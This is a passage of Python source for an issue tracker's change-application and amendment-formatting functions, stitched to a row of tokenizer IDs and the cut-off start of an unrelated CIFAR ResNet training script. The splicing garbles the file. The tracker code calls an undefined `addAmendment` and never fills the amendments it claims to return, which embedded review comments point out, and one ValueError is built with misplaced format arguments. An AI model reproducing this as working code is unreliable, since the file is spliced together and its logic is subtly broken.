  (merged_labels, update_labels_add,
   update_labels_remove) = framework_bizobj.MergeLabels(
      issue.labels, labels_add, labels_remove, config)
  if not update_labels_add and not update_labels_remove:
    return None
  issue.labels = merged_labels
  return MakeLabelsAmendment(update_labels_add, update_labels_remove)
def ApplyFieldValueChanges(issue, config, fvs_add, fvs_remove, fields_clear):
  """Updates the PB issue's field_values and returns an amendments list.

  Args:
    issue: Issue PB to update in RAM.
    config: ProjectIssueConfig PB containing field_defs for the project.
    fvs_add: list of FieldValue PBs to add to the issue.
    fvs_remove: list of FieldValue PBs to remove from the issue.
    fields_clear: list of field_ids to clear entirely.

  Returns:
    A list of Amendment PBs describing the applied changes.
  """
  phase_names_dict = {phase.phase_id: phase.name for phase in issue.phases}
  phase_ids = list(phase_names_dict.keys())
  # Ignore phase field values that reference a phase this issue does not have.
  (field_vals, added_fvs_by_id,
   removed_fvs_by_id) = _MergeFields(
       issue.field_values,
       [fv for fv in fvs_add if not fv.phase_id or fv.phase_id in phase_ids],
       [fv for fv in fvs_remove if not fv.phase_id or fv.phase_id in phase_ids],
       config.field_defs)
  amendments = []
  if added_fvs_by_id or removed_fvs_by_id:
    issue.field_values = field_vals
    for fd in config.field_defs:
      fd_added_values_by_phase = collections.defaultdict(list)
      fd_removed_values_by_phase = collections.defaultdict(list)
      # Split fd's added/removed fvs by the phase they belong to.
      # non-phase fds will result in {None: [added_fvs]}
      for fv in added_fvs_by_id.get(fd.field_id, []):
        fd_added_values_by_phase[fv.phase_id].append(fv)
      for fv in removed_fvs_by_id.get(fd.field_id, []):
        fd_removed_values_by_phase[fv.phase_id].append(fv)
      # Use all_fv_phase_ids to create Amendments, so no empty amendments
      # are created for issue phases that had no field value changes.
      # BUGFIX: use a set union of the dicts' keys. The previous
      # `dict.keys() + dict.keys()` only worked on Python 2 (lists); on
      # Python 3 keys() returns a view and `+` raises TypeError.
      all_fv_phase_ids = set(fd_removed_values_by_phase) | set(
          fd_added_values_by_phase)
      for phase_id in all_fv_phase_ids:
        new_values = [GetFieldValue(fv, {}) for fv
                      in fd_added_values_by_phase.get(phase_id, [])]
        old_values = [GetFieldValue(fv, {}) for fv
                      in fd_removed_values_by_phase.get(phase_id, [])]
        amendments.append(MakeFieldAmendment(
            fd.field_id, config, new_values, old_values=old_values,
            phase_name=phase_names_dict.get(phase_id)))
  # Note: Clearing fields is used with bulk-editing and phase fields do
  # not appear there and cannot be bulk-edited.
  if fields_clear:
    field_clear_set = set(fields_clear)
    revised_fields = []
    for fd in config.field_defs:
      if fd.field_id not in field_clear_set:
        revised_fields.extend(
            fv for fv in issue.field_values if fv.field_id == fd.field_id)
      else:
        amendments.append(
            MakeFieldClearedAmendment(fd.field_id, config))
        if fd.field_type == tracker_pb2.FieldTypes.ENUM_TYPE:
          # Clearing an enum field also strips its derived '<field>-' labels.
          prefix = fd.field_name.lower() + '-'
          filtered_labels = [
              lab for lab in issue.labels
              if not lab.lower().startswith(prefix)]
          issue.labels = filtered_labels
    issue.field_values = revised_fields
  return amendments
def ApplyIssueDelta(cnxn, issue_service, issue, delta, config):
  """Apply an issue delta to an issue in RAM.

  Only fields that are actually present in the delta (and whose values
  differ from the issue's current values) are changed and recorded as
  amendments.

  Args:
    cnxn: connection to SQL database.
    issue_service: object to access issue-related data in the database.
    issue: Issue to be updated.
    delta: IssueDelta object with new values for everything being changed.
    config: ProjectIssueConfig object for the project containing the issue.

  Returns:
    A pair (amendments, impacted_iids) where amendments is a list of Amendment
    protos to describe what changed, and impacted_iids is a set of other IIDs
    for issues that are modified because they are related to the given issue.

  Raises:
    ValueError: if the delta sets both merged_into and merged_into_external.
  """
  amendments = []
  impacted_iids = set()
  if (delta.status is not None and delta.status != issue.status):
    status = framework_bizobj.CanonicalizeLabel(delta.status)
    amendments.append(MakeStatusAmendment(status, issue.status))
    issue.status = status
  if (delta.owner_id is not None and delta.owner_id != issue.owner_id):
    amendments.append(MakeOwnerAmendment(delta.owner_id, issue.owner_id))
    issue.owner_id = delta.owner_id
  # compute the set of cc'd users added and removed
  cc_add = [cc for cc in delta.cc_ids_add if cc not in issue.cc_ids]
  cc_remove = [cc for cc in delta.cc_ids_remove if cc in issue.cc_ids]
  if cc_add or cc_remove:
    cc_ids = [cc for cc in list(issue.cc_ids) + cc_add
              if cc not in cc_remove]
    issue.cc_ids = cc_ids
    amendments.append(MakeCcAmendment(cc_add, cc_remove))
  # compute the set of components added and removed
  comp_ids_add = [
      c for c in delta.comp_ids_add if c not in issue.component_ids]
  comp_ids_remove = [
      c for c in delta.comp_ids_remove if c in issue.component_ids]
  if comp_ids_add or comp_ids_remove:
    comp_ids = [cid for cid in list(issue.component_ids) + comp_ids_add
                if cid not in comp_ids_remove]
    issue.component_ids = comp_ids
    amendments.append(MakeComponentsAmendment(
        comp_ids_add, comp_ids_remove, config))
  # compute the set of labels added and removed
  label_amendment = ApplyLabelChanges(
      issue, config, delta.labels_add, delta.labels_remove)
  if label_amendment:
    amendments.append(label_amendment)
  # compute the set of custom fields added and removed
  fv_amendments = ApplyFieldValueChanges(
      issue, config, delta.field_vals_add, delta.field_vals_remove,
      delta.fields_clear)
  amendments.extend(fv_amendments)
  # Update blocking and blocked on issues.
  (block_changes_amendments,
   block_changes_impacted_iids) = ApplyIssueBlockRelationChanges(
       cnxn, issue, delta.blocked_on_add, delta.blocked_on_remove,
       delta.blocking_add, delta.blocking_remove, issue_service)
  amendments.extend(block_changes_amendments)
  impacted_iids.update(block_changes_impacted_iids)
  # Update external issue references (blocked-on side).
  # Refs are only added if the shortlink is valid, not already present,
  # and not simultaneously listed for removal.
  if delta.ext_blocked_on_add or delta.ext_blocked_on_remove:
    add_refs = []
    for ext_id in delta.ext_blocked_on_add:
      ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
      if (federated.IsShortlinkValid(ext_id) and
          ref not in issue.dangling_blocked_on_refs and
          ext_id not in delta.ext_blocked_on_remove):
        add_refs.append(ref)
    remove_refs = []
    for ext_id in delta.ext_blocked_on_remove:
      ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
      if (federated.IsShortlinkValid(ext_id) and
          ref in issue.dangling_blocked_on_refs):
        remove_refs.append(ref)
    if add_refs or remove_refs:
      amendments.append(MakeBlockedOnAmendment(add_refs, remove_refs))
      issue.dangling_blocked_on_refs = [
          ref for ref in issue.dangling_blocked_on_refs + add_refs
          if ref.ext_issue_identifier not in delta.ext_blocked_on_remove]
  # Update external issue references (blocking side); mirrors the
  # blocked-on handling above.
  if delta.ext_blocking_add or delta.ext_blocking_remove:
    add_refs = []
    for ext_id in delta.ext_blocking_add:
      ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
      if (federated.IsShortlinkValid(ext_id) and
          ref not in issue.dangling_blocking_refs and
          ext_id not in delta.ext_blocking_remove):
        add_refs.append(ref)
    remove_refs = []
    for ext_id in delta.ext_blocking_remove:
      ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
      if (federated.IsShortlinkValid(ext_id) and
          ref in issue.dangling_blocking_refs):
        remove_refs.append(ref)
    if add_refs or remove_refs:
      amendments.append(MakeBlockingAmendment(add_refs, remove_refs))
      issue.dangling_blocking_refs = [
          ref for ref in issue.dangling_blocking_refs + add_refs
          if ref.ext_issue_identifier not in delta.ext_blocking_remove]
  # merged_into (internal) and merged_into_external are mutually exclusive.
  if delta.merged_into is not None and delta.merged_into_external is not None:
    raise ValueError(('Cannot update merged_into and merged_into_external'
                      ' fields at the same time.'))
  if (delta.merged_into is not None and
      delta.merged_into != issue.merged_into and
      ((delta.merged_into == 0 and issue.merged_into is not None) or
       delta.merged_into != 0)):
    # Handle removing the existing internal merged_into.
    try:
      merged_remove = issue.merged_into
      remove_issue = issue_service.GetIssue(cnxn, merged_remove)
      remove_ref = remove_issue.project_name, remove_issue.local_id
      impacted_iids.add(merged_remove)
    except exceptions.NoSuchIssueException:
      remove_ref = None
    # Handle going from external->internal mergedinto.
    if issue.merged_into_external:
      remove_ref = tracker_pb2.DanglingIssueRef(
          ext_issue_identifier=issue.merged_into_external)
      issue.merged_into_external = None
    # Handle adding the new merged_into.
    try:
      merged_add = delta.merged_into
      issue.merged_into = delta.merged_into
      add_issue = issue_service.GetIssue(cnxn, merged_add)
      add_ref = add_issue.project_name, add_issue.local_id
      impacted_iids.add(merged_add)
    except exceptions.NoSuchIssueException:
      add_ref = None
    amendments.append(MakeMergedIntoAmendment(
        [add_ref], [remove_ref], default_project_name=issue.project_name))
  if (delta.merged_into_external is not None and
      delta.merged_into_external != issue.merged_into_external and
      (federated.IsShortlinkValid(delta.merged_into_external) or
       (delta.merged_into_external == '' and issue.merged_into_external))):
    remove_ref = None
    if issue.merged_into_external:
      remove_ref = tracker_pb2.DanglingIssueRef(
          ext_issue_identifier=issue.merged_into_external)
    elif issue.merged_into:
      # Handle moving from internal->external mergedinto.
      try:
        remove_issue = issue_service.GetIssue(cnxn, issue.merged_into)
        remove_ref = remove_issue.project_name, remove_issue.local_id
        impacted_iids.add(issue.merged_into)
      except exceptions.NoSuchIssueException:
        pass
    add_ref = tracker_pb2.DanglingIssueRef(
        ext_issue_identifier=delta.merged_into_external)
    issue.merged_into = 0
    issue.merged_into_external = delta.merged_into_external
    amendments.append(MakeMergedIntoAmendment([add_ref], [remove_ref],
        default_project_name=issue.project_name))
  if delta.summary and delta.summary != issue.summary:
    amendments.append(MakeSummaryAmendment(delta.summary, issue.summary))
    issue.summary = delta.summary
  return amendments, impacted_iids
def ApplyIssueBlockRelationChanges(
    cnxn, issue, blocked_on_add, blocked_on_remove, blocking_add,
    blocking_remove, issue_service):
  # type: (MonorailConnection, Issue, Collection[int], Collection[int],
  #     Collection[int], Collection[int], IssueService) ->
  #     Sequence[Amendment], Collection[int]
  """Apply issue blocking/blocked_on relation changes to an issue in RAM.

  Args:
    cnxn: connection to SQL database.
    issue: Issue PB that we are applying the changes to.
    blocked_on_add: list of issue IDs that we want to add as blocked_on.
    blocked_on_remove: list of issue IDs that we want to remove from blocked_on.
    blocking_add: list of issue IDs that we want to add as blocking.
    blocking_remove: list of issue IDs that we want to remove from blocking.
    issue_service: IssueService used to fetch info from DB or cache.

  Returns:
    A tuple that holds the list of Amendments that represent the applied changes
    and a set of issue IDs that are impacted by the changes.

  Side-effect:
    The given issue's blocked_on and blocking fields will be modified.
  """
  amendments = []
  impacted_iids = set()
  # Apply blocked_on changes.
  # Filter the requested changes down to ones that are actually no-ops
  # relative to the issue's current blocked_on list.
  old_blocked_on = issue.blocked_on_iids
  blocked_on_add = [iid for iid in blocked_on_add if iid not in old_blocked_on]
  blocked_on_remove = [
      iid for iid in blocked_on_remove if iid in old_blocked_on
  ]
  # blocked_on_add and blocked_on_remove are filtered above such that they
  # could not contain matching items.
  if blocked_on_add or blocked_on_remove:
    # NOTE(review): `addAmendment` is not defined anywhere in this module.
    # This call presumably should build a Make*Amendment and append it to
    # `amendments` (which is otherwise never populated, contradicting the
    # docstring) — verify against the original upstream source.
    addAmendment(blocked_on_add, blocked_on_remove, MakeBlockedOnAmendment)
    new_blocked_on_iids = [
        iid for iid in old_blocked_on + blocked_on_add
        if iid not in blocked_on_remove
    ]
    # SortBlockedOn recomputes both the iid order and the parallel ranks.
    (issue.blocked_on_iids,
     issue.blocked_on_ranks) = issue_service.SortBlockedOn(
         cnxn, issue, new_blocked_on_iids)
    impacted_iids.update(blocked_on_add + blocked_on_remove)
  # Apply blocking changes.
  old_blocking = issue.blocking_iids
  blocking_add = [iid for iid in blocking_add if iid not in old_blocking]
  blocking_remove = [iid for iid in blocking_remove if iid in old_blocking]
  # blocking_add and blocking_remove are filtered above such that they
  # could not contain matching items.
  if blocking_add or blocking_remove:
    # NOTE(review): same undefined `addAmendment` as above — verify.
    addAmendment(blocking_add, blocking_remove, MakeBlockingAmendment)
    issue.blocking_iids = [
        iid for iid in old_blocking + blocking_add if iid not in blocking_remove
    ]
    impacted_iids.update(blocking_add + blocking_remove)
  return amendments, impacted_iids
def MakeAmendment(
    field, new_value, added_ids, removed_ids, custom_field_name=None,
    old_value=None):
  """Utility function to populate an Amendment PB.

  Args:
    field: enum for the field being updated.
    new_value: new string value of that field.
    added_ids: list of user IDs being added.
    removed_ids: list of user IDs being removed.
    custom_field_name: optional name of a custom field.
    old_value: old string value of that field.

  Returns:
    An instance of Amendment.
  """
  pb = tracker_pb2.Amendment()
  pb.field = field
  pb.newvalue = new_value
  pb.added_user_ids.extend(added_ids)
  pb.removed_user_ids.extend(removed_ids)
  # The optional fields are only set when explicitly supplied; an empty
  # string is a valid value, so compare against None.
  if old_value is not None:
    pb.oldvalue = old_value
  if custom_field_name is not None:
    pb.custom_field_name = custom_field_name
  return pb
def _PlusMinusString(added_items, removed_items):
  """Return a concatenation of the items, with a minus on removed items.

  Args:
    added_items: list of string items added.
    removed_items: list of string items removed.

  Returns:
    A unicode string with all the removed items first (preceded by minus
    signs) and then the added items.
  """
  assert all(isinstance(item, string_types)
             for item in added_items + removed_items)
  # TODO(jrobbins): this is not good when values can be negative ints.
  tokens = ['-%s' % item.strip() for item in removed_items if item]
  tokens.extend('%s' % item for item in added_items if item)
  return ' '.join(tokens)
def _PlusMinusAmendment(
    field, added_items, removed_items, custom_field_name=None):
  """Make an Amendment PB with the given added/removed items."""
  # Render removed items with '-' prefixes, then the added items.
  summary = _PlusMinusString(added_items, removed_items)
  return MakeAmendment(
      field, summary, [], [], custom_field_name=custom_field_name)
def _PlusMinusRefsAmendment(
    field, added_refs, removed_refs, default_project_name=None):
  """Make an Amendment PB with the given added/removed refs."""
  # Falsy refs (e.g. None for issues that could not be looked up) are skipped.
  added_strs = [
      FormatIssueRef(ref, default_project_name=default_project_name)
      for ref in added_refs if ref]
  removed_strs = [
      FormatIssueRef(ref, default_project_name=default_project_name)
      for ref in removed_refs if ref]
  return _PlusMinusAmendment(field, added_strs, removed_strs)
def MakeSummaryAmendment(new_summary, old_summary):
  """Make an Amendment PB for a change to the summary."""
  # Record the previous summary so history can show both values.
  return MakeAmendment(
      tracker_pb2.FieldID.SUMMARY, new_summary, [], [],
      old_value=old_summary)
def MakeStatusAmendment(new_status, old_status):
  """Make an Amendment PB for a change to the status."""
  # Record the previous status so history can show both values.
  return MakeAmendment(
      tracker_pb2.FieldID.STATUS, new_status, [], [],
      old_value=old_status)
def MakeOwnerAmendment(new_owner_id, old_owner_id):
  """Make an Amendment PB for a change to the owner."""
  # Owner changes are expressed via user IDs, not a string value.
  return MakeAmendment(
      tracker_pb2.FieldID.OWNER, '', [new_owner_id], [old_owner_id])
def MakeCcAmendment(added_cc_ids, removed_cc_ids):
  """Make an Amendment PB for a change to the Cc list."""
  # Cc changes are expressed via user IDs, not a string value.
  return MakeAmendment(
      tracker_pb2.FieldID.CC, '', added_cc_ids, removed_cc_ids)
def MakeLabelsAmendment(added_labels, removed_labels):
  """Make an Amendment PB for a change to the labels."""
  # Labels render as a '+added -removed' style string value.
  return _PlusMinusAmendment(
      tracker_pb2.FieldID.LABELS, added_labels, removed_labels)
def DiffValueLists(new_list, old_list):
  """Give an old list and a new list, return the added and removed items."""
  # Trivial cases: everything was added, or everything was removed.
  if not old_list:
    return new_list, []
  if not new_list:
    return [], old_list
  # Start by assuming every old item was removed; each matching new item
  # cancels out one old occurrence (duplicates are matched one-for-one).
  removed = list(old_list)
  added = []
  for item in new_list:
    try:
      removed.remove(item)
    except ValueError:
      added.append(item)
  return added, removed
def MakeFieldAmendment(
    field_id, config, new_values, old_values=None, phase_name=None):
  """Return an amendment showing how an issue's field changed.

  Args:
    field_id: int field ID of a built-in or custom issue field.
    config: config info for the current project, including field_defs.
    new_values: list of strings representing new values of field.
    old_values: list of strings representing old values of field.
    phase_name: name of the phase that owned the field that was changed.

  Returns:
    A new Amendment object.

  Raises:
    ValueError: if the specified field was not found.
  """
  fd = FindFieldDefByID(field_id, config)
  if fd is None:
    raise ValueError('field %r vanished mid-request', field_id)
  # Phase fields are displayed as '<phase_name>-<field_name>'.
  field_name = fd.field_name if not phase_name else '%s-%s' % (
      phase_name, fd.field_name)
  if fd.is_multivalued:
    old_values = old_values or []
    added, removed = DiffValueLists(new_values, old_values)
    if fd.field_type == tracker_pb2.FieldTypes.USER_TYPE:
      # User-valued fields carry user IDs rather than a string value.
      return MakeAmendment(
          tracker_pb2.FieldID.CUSTOM, '', added, removed,
          custom_field_name=field_name)
    else:
      return _PlusMinusAmendment(
          tracker_pb2.FieldID.CUSTOM,
          ['%s' % item for item in added],
          ['%s' % item for item in removed],
          custom_field_name=field_name)
  else:
    if fd.field_type == tracker_pb2.FieldTypes.USER_TYPE:
      return MakeAmendment(
          tracker_pb2.FieldID.CUSTOM, '', new_values, [],
          custom_field_name=field_name)
    # Single-valued non-user field: show the new value, or '----' if cleared.
    if new_values:
      new_str = ', '.join('%s' % item for item in new_values)
    else:
      new_str = '----'
    return MakeAmendment(
        tracker_pb2.FieldID.CUSTOM, new_str, [], [],
        custom_field_name=field_name)
def MakeApprovalStructureAmendment(new_approvals, old_approvals):
  """Return an Amendment showing an issue's approval structure changed.

  Args:
    new_approvals: the new list of approvals.
    old_approvals: the old list of approvals.

  Returns:
    A new Amendment object.
  """
  added, removed = DiffValueLists(new_approvals, old_approvals)
  return MakeAmendment(
      tracker_pb2.FieldID.CUSTOM, _PlusMinusString(added, removed),
      [], [], custom_field_name='Approvals')
def MakeApprovalStatusAmendment(new_status):
  """Return an Amendment showing an issue approval's status changed.

  Args:
    new_status: ApprovalStatus representing the new approval status.

  Returns:
    A new Amendment object.
  """
  # Statuses are displayed in lowercase.
  status_str = new_status.name.lower()
  return MakeAmendment(
      tracker_pb2.FieldID.CUSTOM, status_str, [], [],
      custom_field_name='Status')
def MakeApprovalApproversAmendment(approvers_add, approvers_remove):
  """Return an Amendment showing an issue approval's approvers changed.

  Args:
    approvers_add: list of approver user_ids being added.
    approvers_remove: list of approver user_ids being removed.

  Returns:
    A new Amendment object.
  """
  # Approver changes are expressed via user IDs, not a string value.
  return MakeAmendment(
      tracker_pb2.FieldID.CUSTOM, '', approvers_add, approvers_remove,
      custom_field_name='Approvers')
def MakeComponentsAmendment(added_comp_ids, removed_comp_ids, config):
  """Make an Amendment PB for a change to the components."""
  # TODO(jrobbins): record component IDs as ints and display them with
  # lookups (and maybe permission checks in the future). But, what
  # about history that references deleted components?
  def _ResolvePaths(comp_ids):
    # Map component IDs to their paths; IDs with no definition are skipped.
    paths = []
    for comp_id in comp_ids:
      cd = FindComponentDefByID(comp_id, config)
      if cd:
        paths.append(cd.path)
    return paths

  return _PlusMinusAmendment(
      tracker_pb2.FieldID.COMPONENTS,
      _ResolvePaths(added_comp_ids), _ResolvePaths(removed_comp_ids))
def MakeBlockedOnAmendment(
    added_refs, removed_refs, default_project_name=None):
  """Make an Amendment PB for a change to the blocked on issues."""
  field = tracker_pb2.FieldID.BLOCKEDON
  return _PlusMinusRefsAmendment(
      field, added_refs, removed_refs,
      default_project_name=default_project_name)
def MakeBlockingAmendment(added_refs, removed_refs, default_project_name=None):
  """Make an Amendment PB for a change to the blocking issues."""
  field = tracker_pb2.FieldID.BLOCKING
  return _PlusMinusRefsAmendment(
      field, added_refs, removed_refs,
      default_project_name=default_project_name)
def MakeMergedIntoAmendment(
    added_refs, removed_refs, default_project_name=None):
  """Make an Amendment PB for a change to the merged-into issue."""
  field = tracker_pb2.FieldID.MERGEDINTO
  return _PlusMinusRefsAmendment(
      field, added_refs, removed_refs,
      default_project_name=default_project_name)
def MakeProjectAmendment(new_project_name):
  """Make an Amendment PB for a change to an issue's project."""
  # Project moves carry no user IDs and no old value.
  return MakeAmendment(
      tracker_pb2.FieldID.PROJECT, new_project_name, [], [])
def AmendmentString_New(amendment, user_display_names):
  # type: (tracker_pb2.Amendment, Mapping[int, str]) -> str
  """Produce a displayable string for an Amendment PB.

  Args:
    amendment: Amendment PB to display.
    user_display_names: dict {user_id: display_name, ...} including all users
      mentioned in amendment.

  Returns:
    A string that could be displayed on a web page or sent in email.
  """
  if amendment.newvalue:
    return amendment.newvalue
  if amendment.field == tracker_pb2.FieldID.OWNER:
    # Display new owner only.
    added_ids = amendment.added_user_ids
    if added_ids and added_ids[0]:
      return user_display_names[added_ids[0]]
    return framework_constants.NO_USER_NAME
  # User-valued fields: render '-removed added' display names, skipping
  # any IDs that are missing from the lookup dict.
  added_names = [
      user_display_names[uid]
      for uid in amendment.added_user_ids
      if uid in user_display_names
  ]
  removed_names = [
      user_display_names[uid]
      for uid in amendment.removed_user_ids
      if uid in user_display_names
  ]
  return _PlusMinusString(added_names, removed_names)
def AmendmentString(amendment, user_views_by_id):
  """Produce a displayable string for an Amendment PB.

  TODO(crbug.com/monorail/7571): Delete this function in favor of _New.

  Args:
    amendment: Amendment PB to display.
    user_views_by_id: dict {user_id: user_view, ...} including all users
      mentioned in amendment.

  Returns:
    A string that could be displayed on a web page or sent in email.
  """
  if amendment.newvalue:
    return amendment.newvalue
  if amendment.field == tracker_pb2.FieldID.OWNER:
    # Display new owner only.
    added_ids = amendment.added_user_ids
    if added_ids and added_ids[0]:
      return user_views_by_id[added_ids[0]].display_name
    return framework_constants.NO_USER_NAME
  # User-valued fields: '-removed added' display names, skipping IDs
  # missing from the lookup dict.
  return _PlusMinusString(
      [user_views_by_id[uid].display_name
       for uid in amendment.added_user_ids if uid in user_views_by_id],
      [user_views_by_id[uid].display_name
       for uid in amendment.removed_user_ids if uid in user_views_by_id])
def AmendmentLinks(amendment, users_by_id, project_name):
  """Produce a list of value/url pairs for an Amendment PB.

  Args:
    amendment: Amendment PB to display.
    users_by_id: dict {user_id: user_view, ...} including all users
      mentioned in amendment.
    project_name: Name of project the issue/comment/amendment is in.

  Returns:
    A list of dicts with 'value' and 'url' keys. 'url' may be None.
  """
  # Display both old and new summary, status
  if (amendment.field == tracker_pb2.FieldID.SUMMARY or
      amendment.field == tracker_pb2.FieldID.STATUS):
    result = amendment.newvalue
    old_value = amendment.oldvalue
    # Old issues have a 'NULL' string as the old value of the summary
    # or status fields. See crbug.com/monorail/3805
    if old_value and old_value != 'NULL':
      result += ' (was: %s)' % old_value
    return [{'value': result, 'url': None}]
  # Display new owner only
  elif amendment.field == tracker_pb2.FieldID.OWNER:
    if amendment.added_user_ids and amendment.added_user_ids[0]:
      uid = amendment.added_user_ids[0]
      return [{'value': users_by_id[uid].display_name, 'url': None}]
    return [{'value': framework_constants.NO_USER_NAME, 'url': None}]
  elif amendment.field in (tracker_pb2.FieldID.BLOCKEDON,
                           tracker_pb2.FieldID.BLOCKING,
                           tracker_pb2.FieldID.MERGEDINTO):
    # Each referenced issue becomes a link to its detail page.
    values = amendment.newvalue.split()
    bug_refs = [_SafeParseIssueRef(v.strip()) for v in values]
    issue_urls = [FormatIssueURL(ref, default_project_name=project_name)
                  for ref in bug_refs]
    # TODO(jrobbins): Permission checks on referenced issues to allow
    # showing summary on hover.
    return [{'value': v, 'url': u} for (v, u) in zip(values, issue_urls)]
  elif amendment.newvalue:
    # Catchall for everything except user-valued fields.
    return [{'value': v, 'url': None} for v in amendment.newvalue.split()]
  else:
    # Applies to field==CC or CUSTOM with user type.
    values = _PlusMinusString(
        [users_by_id[uid].display_name for uid in amendment.added_user_ids
         if uid in users_by_id],
        [users_by_id[uid].display_name for uid in amendment.removed_user_ids
         if uid in users_by_id])
    return [{'value': v.strip(), 'url': None} for v in values.split()]
def GetAmendmentFieldName(amendment):
  """Get user-visible name for an amendment to a built-in or custom field."""
  custom_name = amendment.custom_field_name
  if custom_name:
    return custom_name
  # Built-in fields display as their capitalized enum name.
  return str(amendment.field).capitalize()
def MakeDanglingIssueRef(project_name, issue_id, ext_id=''):
  """Create a DanglingIssueRef pb."""
  ref = tracker_pb2.DanglingIssueRef()
  ref.project = project_name
  ref.issue_id = issue_id
  # ext_issue_identifier is only meaningful for external (federated) refs.
  ref.ext_issue_identifier = ext_id
  return ref
def FormatIssueURL(issue_ref_tuple, default_project_name=None):
  """Format an issue url from an issue ref."""
  if issue_ref_tuple is None:
    return ''
  project_name, local_id = issue_ref_tuple
  # Cross-project refs carry their own project; otherwise use the default.
  path = '/p/%s%s' % (
      project_name or default_project_name, urls.ISSUE_DETAIL)
  return framework_helpers.FormatURL(None, path, id=local_id)
def FormatIssueRef(issue_ref_tuple, default_project_name=None):
  """Format an issue reference for users: e.g., 123, or projectname:123."""
  if issue_ref_tuple is None:
    return ''
  # TODO(jeffcarp): Improve method signature to not require isinstance.
  if isinstance(issue_ref_tuple, tracker_pb2.DanglingIssueRef):
    # External refs render as their identifier (possibly empty).
    return issue_ref_tuple.ext_issue_identifier or ''
  project_name, local_id = issue_ref_tuple
  if not project_name or project_name == default_project_name:
    # Same-project refs are shown as a bare local ID.
    return str(local_id)
  return '%s:%d' % (project_name, local_id)
def ParseIssueRef(ref_str):
  """Parse an issue ref string: e.g., 123, or projectname:123 into a tuple.

  Raises ValueError if the ref string exists but can't be parsed.
  """
  if not ref_str.strip():
    return None
  project_name = None
  id_part = ref_str
  if ':' in ref_str:
    project_part, id_part = ref_str.split(':', 1)
    project_name = project_part.strip().lstrip('-')
  # Ignore any leading '-' on the local ID.
  return project_name, int(id_part.lstrip('-'))
def _SafeParseIssueRef(ref_str):
  """Same as ParseIssueRef, but catches ValueError and returns None instead."""
  try:
    parsed = ParseIssueRef(ref_str)
  except ValueError:
    # Malformed refs (e.g. non-numeric IDs) are simply dropped.
    return None
  return parsed
def _MergeFields(field_values, fields_add, fields_remove, field_defs):
  """Merge the fields to add/remove into the current field values.

  Args:
    field_values: list of current FieldValue PBs.
    fields_add: list of FieldValue PBs to add to field_values. If any of these
      is for a single-valued field, it replaces all previous values for the
      same field_id in field_values.
    fields_remove: list of FieldValues to remove from field_values, if found.
    field_defs: list of FieldDef PBs from the issue's project's config.

  Returns:
    A 3-tuple with the merged list of field values and {field_id: field_values}
    dict for the specific values that are added or removed. The actual added
    or removed might be fewer than the requested ones if the issue already had
    one of the values-to-add or lacked one of the values-to-remove.
  """
  is_multi = {fd.field_id: fd.is_multivalued for fd in field_defs}
  merged_fvs = list(field_values)
  added_fvs_by_id = collections.defaultdict(list)
  for fv_consider in fields_add:
    consider_value = GetFieldValue(fv_consider, {})
    for old_fv in field_values:
      # Don't add fv_consider if field_values already contains consider_value
      if (fv_consider.field_id == old_fv.field_id and
          GetFieldValue(old_fv, {}) == consider_value and
          fv_consider.phase_id == old_fv.phase_id):
        break
    else:
      # for-else: we only get here when no existing value matched above.
      # Drop any existing values for non-multi fields.
      if not is_multi.get(fv_consider.field_id):
        if fv_consider.phase_id:
          # Drop existing phase fvs that belong to the same phase
          merged_fvs = [fv for fv in merged_fvs if
                        not (fv.field_id == fv_consider.field_id
                             and fv.phase_id == fv_consider.phase_id)]
        else:
          # Drop existing non-phase fvs
          merged_fvs = [fv for fv in merged_fvs if
                        not fv.field_id == fv_consider.field_id]
      added_fvs_by_id[fv_consider.field_id].append(fv_consider)
      merged_fvs.append(fv_consider)
  removed_fvs_by_id = collections.defaultdict(list)
  for fv_consider in fields_remove:
    consider_value = GetFieldValue(fv_consider, {})
    for old_fv in field_values:
      # Only remove fv_consider if field_values contains consider_value
      if (fv_consider.field_id == old_fv.field_id and
          GetFieldValue(old_fv, {}) == consider_value and
          fv_consider.phase_id == old_fv.phase_id):
        removed_fvs_by_id[fv_consider.field_id].append(fv_consider)
        merged_fvs.remove(old_fv)
  return merged_fvs, added_fvs_by_id, removed_fvs_by_id
def SplitBlockedOnRanks(issue, target_iid, split_above, open_iids):
  """Splits issue relation rankings by some target issue's rank

  Args:
    issue: Issue PB for the issue considered.
    target_iid: the global ID of the issue to split rankings about.
    split_above: False to split below the target issue, True to split above.
    open_iids: a list of global IDs of open and visible issues blocking
      the considered issue.

  Returns:
    A tuple (lower, higher) where both are lists of
    [(blocker_iid, rank),...] of issues in rank order. If split_above is False
    the target issue is included in higher, otherwise it is included in lower
  """
  # Keep only open/visible blockers, paired with their ranks.
  pairs = [
      (dst_iid, rank)
      for dst_iid, rank in zip(issue.blocked_on_iids, issue.blocked_on_ranks)
      if dst_iid in open_iids]
  # blocked_on_iids is sorted high-to-low, we need low-to-high
  pairs.reverse()
  offset = 1 if split_above else 0
  for index, (dst_iid, _) in enumerate(pairs):
    if dst_iid == target_iid:
      split_at = index + offset
      return pairs[:split_at], pairs[split_at:]
  logging.error('Target issue %r was not found in blocked_on_iids of %r',
                target_iid, issue)
  return pairs, []
| [
2,
15069,
1584,
383,
18255,
1505,
46665,
13,
1439,
2489,
10395,
13,
198,
2,
5765,
286,
428,
2723,
2438,
318,
21825,
416,
257,
347,
10305,
12,
7635,
198,
2,
5964,
326,
460,
307,
1043,
287,
262,
38559,
24290,
2393,
393,
379,
198,
2,
... | 2.748121 | 23,015 |
"""
Copyright 2017 JetBrains, s.r.o
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from fasttrain import train_on_cifar
from fasttrain.model.resnet import ResNetCIFAR
from fasttrain.schedules import resnet_paper_schedule, TOTAL_EPOCHS
def _str2bool(value):
    """Parse a textual CLI boolean.

    argparse's ``type=bool`` is a trap: ``bool('False')`` is True because
    any non-empty string is truthy, so ``--show-test False`` would enable
    the flag. This converter accepts the usual spellings and rejects
    anything else.
    """
    normalized = value.strip().lower()
    if normalized in ('true', 't', 'yes', 'y', '1'):
        return True
    if normalized in ('false', 'f', 'no', 'n', '0'):
        return False
